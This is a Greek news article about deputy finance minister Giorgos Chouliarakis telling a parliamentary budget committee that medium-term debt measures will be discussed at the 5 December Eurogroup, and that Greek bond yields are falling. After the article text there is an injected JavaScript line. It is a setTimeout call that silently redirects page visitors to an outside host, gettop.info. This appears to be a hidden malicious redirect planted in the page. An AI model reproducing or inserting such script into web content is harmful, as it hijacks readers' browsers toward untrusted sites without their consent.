Χουλιαράκης: Στο επόμενο Eurogroup τα μεσοπρόθεσμα μέτρα για το χρέος

0
8

Την προσδοκία της Αθήνας προκειμένου στο επόμενο Eurogroup της 5ης Δεκέμβρη θα συζητηθούν τα μεσοπρόθεσμα μέτρα για την επίλυση του ζητήματος του χρέους εξέφρασε ο αναπληρωτής Υπουργός Οικονομικών, Γιώργος Χουλιαράκης μιλώντας στην Επιτροπή Οικονομικών Υποθέσεων, που επεξεργάζεται τον Προϋπολογισμό του 2017.

«Έχουν ήδη αποφασιστεί τα βραχυπρόθεσμα μέτρα και συμβάλλουν στο χρέος. Στο επόμενο Eurogroup θα συζητηθούν τα μεσοπρόθεσμα και θα παραμετροποιηθούν στο αμέσως επόμενο διάστημα», τόνισε ο κ. Χουλιαράκης προσθέτοντας ότι τον χειμώνα του 2017 η χώρα θα ενταχθεί στο πρόγραμμα ποσοτικής χαλάρωσης, που είναι προθάλαμος για την έξοδο στις αγορές.

Ο ίδιος, πάντως, παραδέχτηκε ότι μετά τις αμερικάνικες εκλογές κι ενώ τα επιτόκια άρχισαν να ανεβαίνουν τα ελληνικά συνέχισαν να μειώνονται. «Σήμερα βρίσκονται στο επίπεδο της Άνοιξης του 2014 και υπάρχει προοπτική με την έγκαιρη ολοκλήρωση της δεύτερης αξιολόγησης και την ένταξη στην ποσοτική χαλάρωση να μειωθούν κι άλλο», είπε αποδεχόμενος ότι επί εποχής Αντώνη Σαμαρά τα επιτόκια ήταν πραγματικά χαμηλά.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here